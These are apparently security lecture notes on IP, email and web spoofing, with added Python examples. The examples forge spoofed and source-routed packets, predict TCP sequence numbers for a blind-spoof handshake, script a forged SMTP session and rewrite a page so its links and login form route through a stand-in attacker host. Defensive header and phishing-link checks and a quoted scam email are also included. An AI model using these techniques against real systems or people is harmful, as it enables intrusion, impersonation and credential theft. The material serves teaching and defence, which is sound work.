Basics

Types of spoofing:
• IP spoofing: the attacker uses the IP address of another computer to acquire information or gain access.
• Email spoofing: the attacker sends email but makes it appear to come from someone else.
• Web spoofing: the attacker tricks a web browser into communicating with a different web server than the user intended.

IP Spoofing

• IP spoofing is the creation of TCP/IP packets with somebody else's IP address in the source field of the header.
• Routers use the destination IP address to forward packets and ignore the source IP address (unless the edge network does ingress filtering, BCP 38, which drops packets whose source does not belong to that network).
• The source IP address is used only by the destination machine, when it responds back to the source.
• When an attacker spoofs someone's IP address, the victim's reply goes back to that address.
• Since the attacker does not receive packets back, this is called a one-way attack or blind spoofing.
• To see the return packets, the attacker must intercept them.
Basic address change (IP spoofing)

• In Windows go to: Control Panel + Network + TCP/IP + IP screens, and simply change the IP address to the one you want to spoof and reboot.
• In UNIX use ifconfig.
• Crafting packets with a raw socket (IP_HDRINCL) achieves the same thing without touching the interface configuration.
• All replies go to the spoofed address. Since TCP requires a 3-way handshake, no session can be established this way. But a UDP attack could work, because UDP has no handshake.

Source Routing (IP spoofing)

• One way for an attacker to see return traffic from a spoofing attack is to insert himself in the path the traffic would normally take.
• Internet routing is normally dynamic; there is no guarantee that the same route between 2 IPs is always taken.
• Source routing can be used to guarantee that a packet follows a set path:
  1. Loose source routing (LSR): the sender specifies a list of some IP addresses that a packet must go through (it might go through more).
  2. Strict source routing (SSR): the sender specifies the exact path a packet must take (if it is not possible, the packet is dropped).
• Source routing is supported for diagnosis purposes and to make sure your traffic does not go through a competitor's network.
• The IP header has room for only 40 bytes of options, which limits a source route to nine addresses, i.e. eight intermediate hops plus the final destination. (Many Internet routes require more hops than this.) That is why SSR is not practical.
• An attacker sends a packet to the destination with a spoofed source address but specifies LSR and puts his own IP address in the list, so the reply is routed back through him.
• The best way to protect against source routing spoofing is to simply disable source routing at your routers (and hosts).
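To make the two ideas on this slide concrete, the following added example (not from the lecture) builds a raw IPv4/UDP datagram with a spoofed source address and, optionally, an LSRR option whose route list includes the attacker. It only constructs and decodes the bytes; the addresses, ports and payload are made up for the demo, and putting such a packet on the wire would require a raw socket with IP_HDRINCL and root privileges.

```python
"""Build a raw IPv4/UDP datagram with a spoofed source address and an optional
Loose Source and Record Route (LSRR) option, without sending it.

Added example, not from the lecture. The addresses, ports and payload are
constructed for illustration. Putting this on the wire needs a raw socket
(IP_HDRINCL) and root, and most networks drop source-routed packets."""
import socket
import struct

LSRR_TYPE = 0x83        # RFC 791: copied=1, class=0, option number=3
MAX_ROUTE_ADDRS = 9     # 40 bytes of option space: 3-byte option header + 9 * 4 bytes


def checksum(data):
    """Internet checksum (RFC 1071): one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def lsrr_option(route):
    """Encode an LSRR option: type, length, pointer (starts at 4), then the
    route. The last address in the list is the real final destination; the
    datagram's destination field carries only the first hop."""
    if not 1 <= len(route) <= MAX_ROUTE_ADDRS:
        raise ValueError("LSRR holds at most %d addresses" % MAX_ROUTE_ADDRS)
    body = b"".join(socket.inet_aton(ip) for ip in route)
    opt = bytes([LSRR_TYPE, 3 + len(body), 4]) + body
    return opt + b"\x00" * (-len(opt) % 4)   # pad options to a 32-bit boundary


def build_udp_packet(src_ip, dst_ip, sport, dport, payload, route=None):
    """Return the complete datagram. src_ip is whatever the attacker wants:
    routers forward on dst_ip alone, so the source is never checked en route
    (unless the first-hop network does ingress filtering)."""
    options = lsrr_option(route) if route else b""
    ihl = 5 + len(options) // 4
    udp_len = 8 + len(payload)

    # UDP checksum covers a pseudo-header that includes the (spoofed) source.
    udp_hdr = struct.pack("!HHHH", sport, dport, udp_len, 0)
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_UDP, udp_len))
    udp_csum = checksum(pseudo + udp_hdr + payload) or 0xFFFF
    udp = struct.pack("!HHHH", sport, dport, udp_len, udp_csum) + payload

    # IPv4 header with the checksum field zeroed, then filled in.
    ip_hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ihl * 4 + udp_len,
                         0x1234, 0, 64, socket.IPPROTO_UDP, 0,
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + options
    ip_hdr = ip_hdr[:10] + struct.pack("!H", checksum(ip_hdr)) + ip_hdr[12:]
    return ip_hdr + udp


def parse_ipv4(packet):
    """Decode enough of the header to check what was built."""
    ihl = packet[0] & 0x0F
    opts = packet[20:ihl * 4]
    route = []
    if opts and opts[0] == LSRR_TYPE:
        body = opts[3:opts[1]]
        route = [socket.inet_ntoa(body[i:i + 4]) for i in range(0, len(body), 4)]
    return {
        "src": socket.inet_ntoa(packet[12:16]),
        "dst": socket.inet_ntoa(packet[16:20]),
        "ihl": ihl,
        "route": route,
        "checksum_ok": checksum(packet[:ihl * 4]) == 0,   # a valid header sums to zero
    }


if __name__ == "__main__":
    pkt = build_udp_packet("10.0.0.5", "192.0.2.10", 40000, 53, b"probe",
                           route=["198.51.100.1", "203.0.113.7"])
    print(parse_ipv4(pkt))
```

The header length grows from 20 to 32 bytes when the two-address LSRR option is present (11 bytes of option plus one byte of padding), which is why the IHL field changes; a tenth address is rejected because it would not fit the 40-byte option space.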
Connection establishment

Establishing a TCP connection: 3-way handshake algorithm between A (client) and B (server)

1. A sends SYN, SeqNum = SN of A.
2. B receives the SYN and sends SYN + ACK, SeqNum = SN of B, AckNum = SN of A + 1.
3. A receives the SYN + ACK and sends ACK, AckNum = SN of B + 1.
4. B receives the ACK; the connection is established.

With a spoofed source address the attacker plays A's part: he sends the SYN carrying the spoofed host's address, but B's SYN + ACK, which carries SN of B, goes to the spoofed host rather than to him. To finish the handshake he must put SN of B + 1 in the ACK without ever having seen SN of B, which is why the next step is sequence number prediction.
Perform sequence number prediction

seconds since noon              Linux        NT           PrevSeqNum + 1000*(time - prevTime)
(04:54:35.20972) 17675.20972    321765071    2887495515   -
17680.19562                     332010905    2887500502   2887500502
17686.79997                     338617656    2887507109   2887507109
17692.00139                     339459049    2887512311   2887512311
17696.80527                     334021331    2887517117   2887517117

The NT column advances by about 1000 per second of wall-clock time, so the next initial sequence number can be predicted to within a few units from the previous one and the elapsed time. The Linux column does not follow the rule (it even decreases in the last row), so the same prediction fails there.

Summary of steps in IP spoofing

• Selecting a victim.
• The trust relationships are reviewed to identify a host (the spoofed) that has a "trust" relationship with the victim.
• The trusted host is then disabled (via SYN flooding) and the target's TCP sequence numbers are analyzed.
• The trusted host is then impersonated and the sequence numbers forged (after being calculated).
• A connection attempt is made to a service that only requires IP-based authentication (no user id or password).
• If a successful connection is made, the attacker executes a simple command to leave a backdoor.
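The following added example (not from the lecture) carries the table and the summary steps through in code: it applies the table's own rule, PrevSeqNum + 1000*(time - prevTime), to the NT and Linux columns, then runs a simulated blind-spoof handshake against a toy server with the same linear generator and against one with random ISNs. The samples are the table's values; the toy server, the trusted-host address and the assumption that the trusted host is already silenced by SYN flooding (so it cannot reset the unexpected SYN+ACK) are constructed for the demo.

```python
"""Sequence number prediction against the NT column of the table above, then a
simulated blind-spoof handshake against a toy server that uses the same
generator. Added example, not from the lecture. NT_SAMPLES and LINUX_SAMPLES
are the table's values; the rate of 1000 per second is the table's own rule
(PrevSeqNum + 1000*(time - prevTime)); the trusted host is assumed to be
already silenced so it cannot reset the unexpected SYN+ACK."""
import random

MASK = 0xFFFFFFFF
ISN_RATE = 1000.0          # ISN units per second of wall-clock time

# (seconds since noon, ISN observed in the server's SYN+ACK), from the table
NT_SAMPLES = [
    (17675.20972, 2887495515),
    (17680.19562, 2887500502),
    (17686.79997, 2887507109),
    (17692.00139, 2887512311),
    (17696.80527, 2887517117),
]
LINUX_SAMPLES = [
    (17675.20972, 321765071),
    (17680.19562, 332010905),
    (17686.79997, 338617656),
    (17692.00139, 339459049),
    (17696.80527, 334021331),
]


def predict_isn(prev_time, prev_isn, now, rate=ISN_RATE):
    """The table's last column: linear extrapolation from the previous sample."""
    return (prev_isn + round(rate * (now - prev_time))) & MASK


def prediction_errors(samples, rate=ISN_RATE):
    """Predicted-vs-observed gap for each consecutive pair of samples."""
    return [isn1 - predict_isn(t0, isn0, t1, rate)
            for (t0, isn0), (t1, isn1) in zip(samples, samples[1:])]


class ToyServer:
    """Server side of the 3-way handshake; trusts clients by source IP only."""
    def __init__(self, base_time, base_isn, randomized=False):
        self.base_time, self.base_isn, self.randomized = base_time, base_isn, randomized
        self.half_open, self.established = {}, set()

    def isn_at(self, now):
        if self.randomized:                        # the fix: unpredictable ISNs
            return random.getrandbits(32)
        return (self.base_isn + round(ISN_RATE * (now - self.base_time))) & MASK

    def recv_syn(self, src_ip, client_seq, now):
        """Record the half-open connection and answer SYN+ACK to src_ip.
        With a spoofed source the reply goes to the trusted host, not the attacker."""
        isn = self.isn_at(now)
        self.half_open[src_ip] = isn
        return {"to": src_ip, "seq": isn, "ack": (client_seq + 1) & MASK}

    def recv_ack(self, src_ip, ack_num):
        """Accept the connection only if the ACK carries ISN + 1."""
        isn = self.half_open.pop(src_ip, None)
        if isn is not None and ack_num == (isn + 1) & MASK:
            self.established.add(src_ip)
            return True
        return False


def blind_spoof(server, trusted_ip, last_sample, attack_time, attacker_seq=4242):
    """Attacker's side: send SYN as trusted_ip, never see the SYN+ACK, and ACK
    the predicted ISN. Returns whether the server accepted the connection."""
    prev_time, prev_isn = last_sample      # from an earlier probe made from the attacker's own IP
    server.recv_syn(trusted_ip, attacker_seq, attack_time)   # the reply is lost to us
    guess = predict_isn(prev_time, prev_isn, attack_time)
    return server.recv_ack(trusted_ip, (guess + 1) & MASK)


if __name__ == "__main__":
    print("NT prediction errors   :", prediction_errors(NT_SAMPLES))
    print("Linux prediction errors:", prediction_errors(LINUX_SAMPLES))
    t, isn = NT_SAMPLES[-1]
    print("linear ISN server:", blind_spoof(ToyServer(t, isn), "10.0.0.9", NT_SAMPLES[-1], t + 3.5))
    print("random ISN server:", blind_spoof(ToyServer(t, isn, True), "10.0.0.9", NT_SAMPLES[-1], t + 3.5))
```

Against the NT samples the prediction is off by at most a few units, which a real attacker covers by sending a handful of ACKs around the guess; against the Linux samples it is off by millions, and against the randomized toy server the spoofed handshake fails.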
Email spoofing techniques

• Aliasing. Example of what the recipient sees:
  From: Bill Clinton
  Sent: Friday, March 22, 2002 4:57 PM
  To: Laura Bush
  Subject: Romantic dinner?
  Mail clients must be configured to show the full email address and not just the alias (display name), which exposes the real sender:
  From: Bill Clinton [mailto: bubba@aol.com]
  Sent: Friday, March 22, 2002 4:57 PM
  To: Laura Bush
  Subject: Romantic dinner?
• Modify the mail client's configured From: address.
• Telnet to port 25 and type the SMTP dialogue by hand, choosing both the envelope sender and the From: header.
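What "telnet to port 25" actually looks like, and what the receiving server records about it, as an added example that is not from the lecture. It lists the lines an attacker would type and runs them through a toy SMTP server (a simplified state machine, constructed for the demo, that handles only HELO, MAIL, RCPT, DATA and QUIT); the addresses are constructed. The point is that the envelope sender (MAIL FROM) and the From: header are both chosen by the typist, while the Return-Path and Received: lines are stamped by the server from what it saw.

```python
"""The 'telnet to port 25' technique: the lines an attacker types at an SMTP
server, and a toy server that shows what such a server records about the
session. Added example, not from the lecture; the server is a simplified
state machine and the addresses are constructed."""


def forged_session(mail_from, rcpt_to, header_from, subject, body):
    """Client lines for a message whose envelope sender and From: header differ.
    Both are supplied by whoever is typing; nothing here is verified."""
    return [
        "HELO mail.example.org",          # the attacker can claim any name here
        "MAIL FROM:<%s>" % mail_from,     # envelope sender, becomes Return-Path
        "RCPT TO:<%s>" % rcpt_to,
        "DATA",
        "From: %s" % header_from,         # what the recipient's client displays
        "To: %s" % rcpt_to,
        "Subject: %s" % subject,
        "",
        body,
        ".",
        "QUIT",
    ]


class ToySmtpServer:
    """Accepts the dialogue above and stamps the message the way a real
    server would: Return-Path from MAIL FROM, Received: from the connection."""
    def __init__(self, name, peer_ip):
        self.name, self.peer_ip = name, peer_ip      # peer_ip is what the TCP layer saw
        self.helo = self.mail_from = None
        self.rcpts, self.in_data, self.data = [], False, []
        self.delivered = []

    def handle(self, line):
        if self.in_data:
            if line == ".":
                self.in_data = False
                stamped = [
                    "Return-Path: <%s>" % self.mail_from,
                    "Received: from %s ([%s]) by %s for %s"
                    % (self.helo, self.peer_ip, self.name, self.rcpts[0]),
                ] + self.data
                self.delivered.append("\n".join(stamped))
                return "250 OK: queued"
            self.data.append(line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            self.helo = arg
            return "250 %s" % self.name
        if verb == "MAIL":
            self.mail_from = arg.split(":", 1)[1].strip("<>")
            return "250 OK"
        if verb == "RCPT":
            self.rcpts.append(arg.split(":", 1)[1].strip("<>"))
            return "250 OK"
        if verb == "DATA":
            self.in_data, self.data = True, []
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Unrecognised command"


def run_session(server, lines):
    """Feed the client lines to the server; return the server's replies."""
    return [reply for reply in (server.handle(line) for line in lines) if reply]


if __name__ == "__main__":
    srv = ToySmtpServer("mx.example.org", "203.0.113.9")
    run_session(srv, forged_session("bubba@aol.com", "laura@example.org",
                                    "Bill Clinton <president@example.gov>",
                                    "Romantic dinner?", "Tonight?"))
    print(srv.delivered[0])
```

The delivered message shows "From: Bill Clinton <president@example.gov>" to the recipient, but its Return-Path is the address typed at MAIL FROM and its Received: line carries the connecting IP 203.0.113.9, which is why header examination (next slide) works even when the visible sender is forged.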
Modifying a Mail Client

• When email is sent by a user, the From: address is not validated.
• An attacker can use a mail client to specify whatever From: address he wants (Eudora, Outlook).
• When the receiver replies, the reply goes to the From: address and not to the person spoofing it.
• Email messages should be logged by mail servers, to permit the actual sender of a message to be determined during an audit.
• Examination of the full email header will often reveal the actual sender and the machines where the email was originated. Each server prepends its own Received: line, so the bottom-most line is the earliest hop; only the lines added by servers you trust cannot have been forged by the sender.

A full email header may look like:

Return-Path: forged_address@fake.com
Received: from wooftech.net ([207.102.129.200])
  by mail0.mailsender.net (5.1.036) id 395BB63B0012CA18
  for alice@email.net; Thu, 6 Jul 2000 16:43:46 -0700
Received: from localhost ([172.153.252.183]) by popper3.vphos.net ;
  Thu, 06 Jul 2000 16:44:53 -0700
X-Originating-IP: [172.153.252.183]
From: forged_address@fake.com
To: alice@email.net
Date: Thu, 06 Jul 2000 17:43:57 -0600
Subject: Anonymous email
Message-ID: <96292709501@popper3.vphos.net>
X-UIDL: d88aeacb3ad5b77467f87f8facaf9ce0

Assuming the example is not forged, the header implies popper3.vphos.net was the first email server, and 172.153.252.183 the address it saw connecting. This means the sender probably uses the service provider vphos.net.
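The header walk described above, as an added example that is not from the lecture. It parses the sample header shown (re-typed as a constructed message), walks the Received: lines from the bottom up to find the first server and the originating IP, cross-checks X-Originating-IP and the Message-ID domain, and flags places where one hop's "by" server is not the next hop's "from" server. On the slide's own header that last check fires: the bottom line says the message was received by popper3.vphos.net, but the line above says mail0.mailsender.net received it from wooftech.net, so either a hop is missing or a line was forged; this is exactly the "assuming the example is not forged" caveat.

```python
"""Walk the Received: chain of a message to find where it really entered the
mail system. Added example, not from the lecture. SAMPLE_HEADER is the
header shown above, re-typed as a constructed message; the chain check and
the Message-ID cross-check are additions for the demo."""
import email
import re

SAMPLE_HEADER = b"""Return-Path: forged_address@fake.com
Received: from wooftech.net ([207.102.129.200])
 by mail0.mailsender.net (5.1.036) id 395BB63B0012CA18
 for alice@email.net; Thu, 6 Jul 2000 16:43:46 -0700
Received: from localhost ([172.153.252.183]) by popper3.vphos.net ;
 Thu, 06 Jul 2000 16:44:53 -0700
X-Originating-IP: [172.153.252.183]
From: forged_address@fake.com
To: alice@email.net
Date: Thu, 06 Jul 2000 17:43:57 -0600
Subject: Anonymous email
Message-ID: <96292709501@popper3.vphos.net>

(body omitted)
"""

# "from <host> ([<ip>]) ... by <host>": the host after "from" is whatever the
# connecting side claimed in HELO; the bracketed IP is what the server saw.
RECEIVED_RE = re.compile(
    r"from\s+(?P<from>\S+)\s*\(\[?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]?\)?"
    r".*?\bby\s+(?P<by>[\w.-]+)", re.S)


def received_hops(msg):
    """Received: lines are prepended, so the bottom one is the earliest hop."""
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(value)
        hops.append({"from": m["from"], "ip": m["ip"], "by": m["by"]} if m
                    else {"from": None, "ip": None, "by": None, "raw": value})
    return hops


def analyze(raw):
    """Summarise who the message claims to be from versus what the servers recorded."""
    msg = email.message_from_bytes(raw)
    hops = received_hops(msg)
    first = hops[0] if hops else {"by": None, "ip": None}
    xoip = (msg.get("X-Originating-IP") or "").strip("[] ")
    msgid_domain = (msg.get("Message-ID") or "").strip("<> ").rpartition("@")[2]
    # Each hop's "from" should name the server that wrote the previous "by";
    # a mismatch means a hop is missing or a line was forged by the sender.
    breaks = [(a["by"], b["from"]) for a, b in zip(hops, hops[1:])
              if a["by"] != b["from"]]
    return {
        "claimed_from": msg.get("From"),        # trivially forgeable
        "first_server": first["by"],            # where the message entered the mail system
        "origin_ip": first["ip"],               # the address that server saw connecting
        "x_originating_ip": xoip,               # informational; should agree with origin_ip
        "message_id_domain": msgid_domain,      # usually generated by the first server
        "chain_breaks": breaks,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_HEADER).items():
        print("%-20s %s" % (key, value))
```

Only the Received: lines added by servers under your control are trustworthy; everything below the first trusted hop, including X-Originating-IP, could have been typed by the sender, so the chain check is a consistency test rather than proof.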
Web Spoofing

• Web spoofing is tricking someone into visiting a web site other than the one they intend to and mimicking the intended site.
• In this way, an attacker may obtain confidential information.
• They can also provide false or misleading information.
• They can even create a 'shadow copy' of the whole web for the victim.

One way to lure people to a malicious site is to give it a URL that is similar to that of a legitimate site, e.g.,
  www.paypai.com
  wwwFirstNationalBank.com

Another way is for the attacker to provide HTML with a mislabeled link to another page, e.g., in an email. Example:
  <a HREF="http://www.badhack.org"> American Red Cross</a>
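The following added example (not from the lecture) turns the lures on this slide into checks a mail gateway or browser extension could run over links: a look-alike domain test that catches both www.paypai.com (one character off paypal.com) and wwwFirstNationalBank.com (the real brand buried in a longer label), a mislabeled-link test for text such as "American Red Cross" pointing at badhack.org, and a bare-IP-host test for links like the http://61.144.211.22/Verify/ "validation link" in the Citibank story further down. TRUSTED and SAMPLE_HTML are constructed for the demo, and the two-label "registrable domain" shortcut would need the public suffix list in real code.

```python
"""Heuristic checks on links in HTML for the lures described above: look-alike
domains, links whose text names one organisation while the href points
elsewhere, and links whose host is a bare IP address. Added example, not from
the lecture; TRUSTED and SAMPLE_HTML are constructed for the demo."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED = {                       # brand phrase -> its legitimate registrable domain
    "paypal": "paypal.com",
    "first national bank": "firstnationalbank.com",
    "american red cross": "redcross.org",
    "citibank": "citibank.com",
}

SAMPLE_HTML = """
<p><a href="http://www.paypai.com/login">Log in</a></p>
<p><a href="http://wwwFirstNationalBank.com">First National Bank</a></p>
<p><a HREF="http://www.badhack.org"> American Red Cross</a></p>
<p><a href="http://61.144.211.22/Verify/">Verify your Citibank account</a></p>
<p><a href="https://www.paypal.com/">PayPal</a></p>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":                      # attribute names arrive lower-cased (HREF -> href)
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def levenshtein(a, b):
    """Edit distance; 'paypai' is one substitution away from 'paypal'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Last two labels; fine for .com/.org demos, real code needs the public suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_link(href, text):
    """Return a list of findings for one link; empty means nothing suspicious."""
    host = urlsplit(href).hostname or ""
    domain, findings = registrable(host), []
    if is_ip_literal(host):
        findings.append("ip-literal-host")
    elif domain not in TRUSTED.values():
        label = domain.split(".")[0]
        for legit in TRUSTED.values():
            legit_label = legit.split(".")[0]
            # close in edit distance, or the real brand embedded in a longer label
            if levenshtein(label, legit_label) <= 2 or legit_label in label:
                findings.append("lookalike:" + legit)
    for phrase, legit in TRUSTED.items():
        if phrase in text.lower() and domain != legit:
            findings.append("mislabeled:" + phrase)
    return findings


def audit_links(html):
    collector = LinkCollector()
    collector.feed(html)
    return [(href, text, classify_link(href, text)) for href, text in collector.links]


if __name__ == "__main__":
    for href, text, findings in audit_links(SAMPLE_HTML):
        print("%-40s %-30s %s" % (href, text, findings or "ok"))
```

These are heuristics, not proof: a legitimate link can trip the edit-distance test, and an attacker who registers a domain far from any brand name and avoids brand words in the link text passes all three checks.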
A recent incident

>Subject: Your Assistance
>Date: Mon, 22 Aug 2005 23:33:01 +0000
>
>Your Assistance
>10 NKRUMA WAY,
>MONROVIA, Liberia.
>
>My name is James Odion. I was the director of special duties to president
>Charles Taylor in Liberia. We the former members of government are no
>longer in Liberia. We are currently in exile outside our country.
>
>I am requesting your co-operation for immediate acceptance of my
>US$12,000,000.00 {Twelve Million United States Dollars Only}.
>
>This amount is my compensation from unofficial payments made to our
>government by foreign buyers of our major export, diamonds, which were
>under my supervision. As the former Director of Special Duties, President
>Charles Taylor compensated me with these funds during our last days in
>Liberia before we handed over power to the interim government a few years
>back.
>
>All that has to do with the US$12M is decent, morally sound, and legal.
>But the money is in United States Dollars, which attracts undue attention
>especially when it is connected with someone in and around government. I
>therefore request that you receive and keep the funds on my behalf until I
>am able to take back control of it in a short period of time. Please reply
>to me urgently so you can receive the amount into your bank account. Once the
>money is in your account, feel free to keep 20% of it for your personal
>use as compensation for your efforts, while the balance will be kept for me
>until I can take control of it.
>
>We shall sign a formal partnership agreement and I can also make available
>my detailed profile and photographs to assure you of my honesty and good
>faith. Send me the following information:
>
>1. Your direct telephone and fax numbers.
>
>2. Bank account details where you want the money transferred into.
>
>I need to call you and speak with you on the phone and also fax you the
>relevant documents before the funds will be transferred into your bank
>account.
>Please reply to my alternate email address as soon as possible:
>flonoch@yahoo.co.uk
>
>Yours faithfully,
>James Odion

• Attackers registered a domain named www.citi.com (as opposed to citibank.com).
• They sent emails to the bank's customers asking them to connect to the new web site (by simply clicking on the link below) and re-register by entering their account information (including password).
Taking down the Citibank scam. (blog post, 7/31/2004)

Today, ironically only a few days after Slashdot posted a link to the email fraud IQ test, I received a message from Citibank.
This would be all fine and good, except I don't have an account at Citibank, never have, and probably never will. I immediately suspected a scam.
So, I did a little hacking and discovered that 'validation link' really pointed to not a URL, but an IP address. To be precise, the link pointed to
http://61.144.211.22/Verify/
Hmmm. Very odd.
But wait! There's more. Let's take a look at the email header.
From: Citi Identity Theft Solutions admin419 @citi.com
Subject: Urgent Message From Citibank
That looks ok so far, but when I expanded the header...
Citi Solutions admin419 @citi.com
Subject: Urgent Message From Citibank
Reply-To: Citi Identity Theft Solutions admin419 @citi.com
To: apex1 (at) bellsouth.net
Citibank mass routing an email through a bellsouth account? This definitely ain't Citibank, folks.
But just to be sure, let's do a whois lookup on that IP address (61.144.211.22) to see who is really behind it all.
This is the info I got back.

Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
ReferralServer: whois://whois.apnic.net
NetRange: 61.0.0.0 - 61.255.255.255
CIDR: 61.0.0.0/8
NetName: APNIC3
NetHandle: NET-61-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: NS.RIPE.NET
NameServer: TINNIE.ARIN.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Web spoofing

• On the copied HTML, the attacker must ensure that the URLs are modified so that every link points back at his server. For example, if the attacker's server is "www.attacker.com", a link such as http://www.mybank.com should become http://www.attacker.com/http://www.mybank.com
• If the victim follows a link on the rewritten page, the next page will again be fetched from the attacker's server, which relays it from the real site and rewrites it in turn; this is how the 'shadow copy' of the web is maintained.
• A user can try to avoid being spoofed by checking the browser's status/location line before clicking on a link. (Note that some browsers truncate the left side of a long URL, so the attacker's prefix may be hidden and only the legitimate-looking tail is shown.)
• JavaScript can be used to rewrite the status and location lines. (Modern browsers ignore scripted changes to the status bar, but the rewritten URLs themselves remain.)
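The rewriting step on this slide, together with the victim-side view of it, as an added example that is not from the lecture. It rewrites every fetchable URL in a page so that it is routed through the attacker's server in the form the slide gives (http://www.attacker.com/http://www.mybank.com), resolving relative links against the real page first (a relative link left alone would otherwise escape the shadow copy), recovers the real destination from a wrapped URL, and shows what a browser that truncates the left side of the location line would display. The attacker prefix is the slide's; the sample page and its base URL are constructed.

```python
"""The attacker's URL rewriting from the slide, and the victim-side view of it.
Added example, not from the lecture. ATTACKER is the prefix the slide uses;
SAMPLE_PAGE and its base URL are constructed."""
from html.parser import HTMLParser
from urllib.parse import urljoin

ATTACKER = "http://www.attacker.com/"     # every rewritten URL starts with this
REWRITE = {"a": "href", "img": "src", "form": "action", "link": "href", "script": "src"}
SKIP = ("javascript:", "mailto:", "#", "data:")   # not fetched from a server; leave alone

SAMPLE_PAGE = ('<a href="http://www.mybank.com">home</a>'
               '<a href="/accounts">accounts</a>'
               '<img src="logo.png">'
               '<form action="login.cgi"><input name="pw"></form>'
               '<a href="#top">top</a>')


def wrap(url, base):
    """Resolve a possibly relative URL against the real page it came from, then
    prefix it so the next fetch comes back to the attacker's server."""
    return ATTACKER + urljoin(base, url)


def unwrap(url):
    """Recover the real destination from a wrapped URL, or None if it is not wrapped."""
    return url[len(ATTACKER):] if url.startswith(ATTACKER) else None


class Rewriter(HTMLParser):
    """Re-emit the page with every fetchable URL routed through the attacker."""
    def __init__(self, base):
        super().__init__(convert_charrefs=False)
        self.base, self.out, self.rewritten = base, [], []

    def handle_starttag(self, tag, attrs):
        parts = []
        for name, value in attrs:
            if name == REWRITE.get(tag) and value and not value.startswith(SKIP):
                new = wrap(value, self.base)
                self.rewritten.append((value, new))
                value = new
            parts.append(' %s="%s"' % (name, value) if value is not None else " " + name)
        self.out.append("<%s%s>" % (tag, "".join(parts)))

    def handle_endtag(self, tag):
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append("&%s;" % name)

    def handle_charref(self, name):
        self.out.append("&#%s;" % name)


def shadow_copy(html, base):
    """Return (rewritten html, [(original url, wrapped url), ...])."""
    r = Rewriter(base)
    r.feed(html)
    r.close()
    return "".join(r.out), r.rewritten


def status_line(url, width):
    """What a browser that truncates the left of a long URL shows: the tail
    of a wrapped URL looks exactly like the legitimate address."""
    return url if len(url) <= width else url[-width:]


if __name__ == "__main__":
    page, mapping = shadow_copy(SAMPLE_PAGE, "http://www.mybank.com/index.html")
    print(page)
    for original, wrapped in mapping:
        print("%-25s -> %s" % (original, wrapped))
    print("status line shows:", status_line(mapping[0][1], 21))
```

The form's action is rewritten too, which is the step that actually captures the password: the victim's POST goes to the attacker, who forwards it to the real login page and relays the response.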